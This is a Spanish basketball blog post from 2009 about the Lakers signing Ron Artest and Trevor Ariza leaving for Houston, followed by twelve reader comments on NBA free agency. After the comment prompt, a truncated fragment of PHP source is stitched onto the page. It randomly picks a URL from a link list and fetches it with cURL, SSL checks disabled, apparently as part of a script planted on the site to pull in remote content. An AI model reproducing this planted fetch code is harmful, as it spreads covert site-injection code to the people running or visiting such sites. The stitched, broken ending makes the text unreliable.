Artest in, Ariza out

03 de July de 2009 por TheDeerHunter

Desde que Lakers ganaran el anillo se venía especulando con la conservación de la plantilla de cara a la próxima campaña, con el límite salarial ya comprometido, la opción de Kobe para rescindir el contrato, la salud de Phil Jackson y las renovaciones pendientes de Odom, Ariza y Shannon Brown.

Con el asunto Kobe aclarado con que seguirá, ayer leíamos la noticia que Ariza rechazaba una oferta cercana a la mid-level, de aproximadamente 5,6 millones de dólares, y su agente diciendo que el jugador debería ser el alero más cotizado del mercado. Se decía que 8 millones era lo que él pedía. Un tira y afloja normal dentro de este tipo de negociaciones. En el término medio podía estar la clave, pensábamos algunos…

Tan sólo un día después saltan las noticias. Ron Artest ficha por los Lakers por 6 kilos y 3 años. Houston contrata a Ariza por 33 en 5. ¿Einnn??? Habéis leído bien, prácticamente lo mismo. Medio millón de diferencia que, sobre las cifras que se manejan, no parece algo insalvable para ponerse de acuerdo.
Hay lecturas buenas y malas acerca de la operación. Por un lado, si hace días se dudaba muy mucho de si los Lakers iban a poder asumir la renovación de ninguno de los dos aleros que tenían que afrontarla, ahora queda asegurada la posición de 3 con un jugador, hoy por hoy, tanto o más competitivo que Ariza, por un coste razonable. Debemos recordar que Artest ha renunciado a un millón de dólares por la posibilidad de obtener el anillo y en algunos aspectos es un jugador superior a Ariza.

Por el otro pierdes un jugador importantísimo en el título conseguido, de conducta intachable, perfectamente adaptado al vestuario, al sistema y a su función dentro del mismo y con un potencial incalculable. Artest, como sabemos, no es que cumpla exactamente con todas estas virtudes. Todo por medio millón de diferencia.

Ariza también sale perdiendo. No cubre sus pretensiones económicas… y deportivamente pierde a priori la posibilidad de otro título a corto plazo, sobre todo si se confirma la terrible lesión de Yao, que podría terminar con la carrera del chino. Como positivo se me ocurre que seguramente tendrá más peso en el nuevo equipo.

En otro orden de cosas, Boozer seguirá el año que le queda en los Jazz; Gortat ha sido fichado por los Mavs por también la mid-level; a Randolph, como era previsible por el efecto Griffin, lo han mandado para Memphis a cambio de Quentin Richardson; Oberto ha sido cortado por los Pistons y se rumorea que éstos tienen atados a Villanueva y Ben Gordon, buenos elementos. Adicionalmente se dice que los Blazers estarían dispuestos a pagar 10 kilos por temporada a Turkoglu… Ese es el músculo que pedía McMillan. Normal que Rudy esté con la mosca…

Comenta

12 comentarios a esta entrada

  1. David dice:
    #1

    Escuché algo de Rudy de que no descartaba volver a Europa… yo no lo haría en absoluto, ahora que tiene medio camino recorrido. Ahora bien, debería salir de allí
    Eso sí, exclusivamente pensando en Portland, vaya fichaje el de Turkoglu.

    En lo de Ariza-Artest, teniendo en cuenta que el primero está perfectamente adaptado al equipo, y el equipo a él, yo no hubiera pagado más por Artest que por él

      Citar

  2. Kantonyo dice:
    #2

    Artest es un gran jugador, y cada año que pasa es mejor defensor, pero….. Si hay alguna manera de estropear esta gran plantilla, es con este tipo de incorporaciones. En mi opinión, esta incorporación no venía a cuento, no había por que arriesgarse…

    En cuanto a Ariza, por una parte es malo para el jugador, ya que como bien dice Deer, pierde la oportunidad de disputar el anillo, el año que viene, y solo por medio millón de euros. Por otra parte, como aficionado, me parece interesante ver como Trevor va a responder teniendo más protagonismo, teniendo en cuenta la baja de Yao, y las continuas lesiones de McGrady … Tiene las cualidades para ser uno de los mejores jugadores de la NBA, y en Lakers siempre estaría a la sombra de Kobe, Pau, Lamar o Andrew.

      Citar

  3. Héctor dice:
    #3

    Yo creo que en este “trade sui generis” entre Artest y Ariza los Lakers salen ganando de largo. Es cierto que Ariza dio un salto de calidad importante en los Playoffs y fue clave en la consecución del título, pero no hay que olvidar que sus números no son como para pedir el oro y el moro por una renovación. Por un sueldo parecido yo me quedaba con los ojos cerrados con Ron Ron, mucho más consolidado y mejor que Ariza en la mayoría de aspectos del juego. Quizá su único problema sea el carácter, pero Artest está mentalizado en dejar de lado sus cortocircuitos y ganar el Anillo de una vez por todas. Además, si algo bueno tiene Phil Jackson es su psicología y su mano izquierda con jugadores conflictivos. ¿Os acordáis de Dennis Rodman?

    Y en cuanto a Ariza…seguramente en Houston tenga más protagonismo individual (un arma de doble filo, porque pueden notarse aún más las carencias al no estar arropado por varias estrellas), y más teniendo en cuenta de que no estarán Yao y T-Mac. Pero por un palmo más de tierra (o unos milloncitos de dólares más, en este caso) puede quedarse sin oler el Anillo unos cuantos años.

      Citar

  4. R. Samuel dice:
    #4

    El fichaje de Ron Ron es todo un acierto, se mire por donde se mire, salvo mirando al futuro xD. Pero es que estos lakers no están hechos pensando en el futuro, quieren titulos ahora. Hoy en día Artest es mejor jugador que Ariza tanto defensiva como ofensivamente, va a imprimir caracter, va a aportar mucha mas intensidad al equipo, va a liberar de presión defensiva a Kobe contra jugadores como Lebron, encima puede jugar en mas posiciones que Ariza. Sólo debe aceptar su rol dentro del equipo y creo que sus ganas por ganar el anillo serán suficientes para que lo haga. Además creo que este fichaje hace más posible la renovación de LO, seguramente 1 año o 2 más de contrato y que pueda seguir siendo agente libre cada año. Saben que van a sobrepasar el limite salarial 2-3 años y lo harán si aspiran a ganar titulos. Cuando pasen estos años tocará reestructuración y ya habrá tiempo para pagar menos (acabarán contrato Kobe, Pau, LO se supone estará fuera, Artest también acabará contrato, quedará el contrato de Bynum que esperemos rinda como prometía). A ver si logran colocar a morrison, vujacic y walton y pillan algun buen tirador de 3 y el tema del base.. yo también buscaría otro xD. Resumiendo, un acierto.

      Citar

  5. Fran Reyes dice:
    #5

    Me parece increíble que Memphis haya incorporado a Zach Randolph. Osease, con él tienes una plantilla de relumbrón, un quinteto Conley – Mayo – Gay – Randolph – Gasol que en el 2K9 sería para asustar… pero en la realidad será un equipo de tiramelones absoluto. Personalmente, cambiaría a Gay y Randolph por un par de packs con los cuales conseguir algo de juego colectivo y, sobre todo, fondo de armario… que quitas a Gay y sólo puedes poner a Arthur.
    Por otra parte, con Thabeet y Gasol no hay sitio para Hamed Hadaddi, que tan bien lo hiciera en los últimos partidos de la temporada pasada. ¿Pensarán hacer algo con él? ¿O quizá cambiar a Thabeet?

      Citar

  6. TheDeerHunter dice:
    #6

    Al final Turkoglu a Toronto, por un buen pellizco de dinero… diría que buena le han salvado de McMillan.

    Sobre el Artest-Ariza… juer, es que el día anterior le habían la mid a Ariza y les había mandado a la mierda… aunque por lo que se ha dicho ya habían mantenido contactos con Artest y Kobe le había mandado unos cuantos mensajitos de esos que manda él.

    Los Lakers han actuado de forma conservadora. Tras Artest habían unos cuantos pretendientes y había que moverse rápido. Yo creo que en L.A. había poca confianza en renovar a Ariza por ese dinero… y francamente, a mí es lo que más me sorprende de todo, los 6,5 de Ariza en Houston. Yo creo que ninguno de los que por aquí hablamos pensábamos que Ariza iba a bajar de los 7,5… y es una pasta que los Lakers no debían entrar.
    De todas formas, hablo en nombre de todos los aficionados de Lakers, aún sabiendo que Artest puede ser superior a corto plazo hubieramos preferido renovar a Ariza. Es un gran jugador que hemos disfrutado pero que se nos ha escapado.

    Por cierto, todo esto abre otras cuestiones: La renovación de Odom menos imposible que hace un par de días… y la necesaria salida de Morrison. Yo creo que todavía se puede sacar interesante tajada por él… quizás incluyendo a Farmar o Vujacic en el paquete. A Shannon Brown hay que renovarle… por kilo o kilo y medio estaría bien. Más no.
    Por cierto… sigo pensando que Odom debería de hacer un esfuerzo importante por quedarse… y los Lakers no tanto por retenerlo. Con todo me gustaría que se quedara… aunque a veces me gustaría asesinarle.

      Citar

  7. TheDeerHunter dice:
    #7

    … Y otra más: Se confirma que Phil Jackson continúa ¿otro efecto Artest??
    precísamente una de las peores dudas que me generaba el asunto era ese…

      Citar

  8. toni dice:
    #8

    Hay varios aspectos a debatir:

    – Turkoglu jugará Calde. Este movimiento le quitará protragonismo en ataque a Mr Catering porque como ya sabeis al turco le gusta subir y tener la bola.

    – Artest x Ariza: Puede salir mal o muy bien, alguno dijo lo de Rodman, tiene sus similitudes pero tampoco estamos en lo mismo, Ariza era la pieza que le faltó a los Lakers el año pasado para ganar el anillo y ahora que la tienen y ganan el anillo, fichan a Artest que suele ser problematico, no es un gran tirador aunque es muy buen defensor. Salga mal o bien, yo no me la hubiera jugado, soy de los que piensa que cuando algo funciona…

    – Si se confirma lo de Ben Gordon con los Pistons, puede provocar una oleada de traspasos de Escoltas con la mas que provable emigracion de Rip.

    – ¿Donde vamos a ver a Iverson? ¿Retirada? ¿Marbury?

    Aun queda mucho verano y muchas incognitas por resolver.

      Citar

  9. Jabho dice:
    #9

    En el tema de Memphis completamente de acuerdo con Fran. No puedes juntar 2 tipos con tan poco sentido del juego colectivo como Gay y Zach, más aun cuando tu futuro está en hombros de Mayo. En fin, ganarán mas partidos pero va a sufrir y mucho el bueno de Marc.

    El tema de Ariza-Artest, para el rol que debían jugar en los Lakers creo que es mejor, y de largo, Ariza. Eso de que Artest cada vez es mejor jugador no lo veo, la verdad. Que estará calmado si lo veo, pero no que no reclame su protagonismo y sus tiros. Rodman era un tipo que disfrutaba con su rol de gladiador bajo los aros. Artest de verdad que se cree bueno y como tal el tira y tira…

    Puede funcionar, no lo niego. Pero Ariza funcionaba seguro y lo de Artest está por ver.

      Citar

  10. max dice:
    #10

    Hay algun rumor que situa a Iverson en Memphis…. Como sea cierto, los Grizzlies van a tener que jugar con cuatro balones!!! A Marc le va a quedar uno o dos tiros por partido ( en el calentamiento, claro)

      Citar

  11. javi dice:
    #11

    Puff!!!!, en menudo marrón se han metido los lakers. No dudo de la calidad del señor Artest, pero creo que su ego y el de Bryant son incompatibles. Os imaginais ese vestuario despues de perder un partido x q Bryant no soltara el último balón???. Eso si que puede ser un buen espectáculo….

    Y lo de Memphis, es de traca. No se hacia dónde pretenden ir. Q pretenden conseguir con Randolph???. Vas a construir un equipo con este tipo de principal anotador??. Espero que se muevan un poco en el mercado. Y la situación de Marc cada vez se torna más y más negro. Por lo pronto, menos tiros y unrookie que le quitará minutos

      Citar

  12. Toni dice:
    #12

    Sheed a los Celtics.
    Y ahora van a por Hill, van a hacer un bloque muy experimentado y con ganas de ganar, seran dificiles de doblegar. Aunque creo que el fichaje mas importante de este verano será el de Shaq por Cleveland, sin duda es un jugador muy determinante, para muchos el que más todavia.

    Llamadme como querais pero yo de los Lakers tiraba la casa por la ventana por un base joven y buscaría una salida a Farmar, yo apostaría por alguno de este Draft, me la jugaría con Jennings o Ricky. Aunque fisher metiera el par de triples en las finales, va de capa caida, es innegable y Ricky con su agoviante defensa y su vision de juego, creo que encajaría en este equipo. Jennings aunque sea un bocazas y esté verde, es muy creativo y tecnico. En contra tiene el super contrato de Bynum y la mas que obligada renovación de Odom. Este año, impuesto de lujo segurisimo.

    Ilyasova y Andersen a la Nba tambien, yo no me iría, tienen una situacion envidiable en el Regal y en America van a ser suplentes seguro. Como tira USA, es como un imán.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>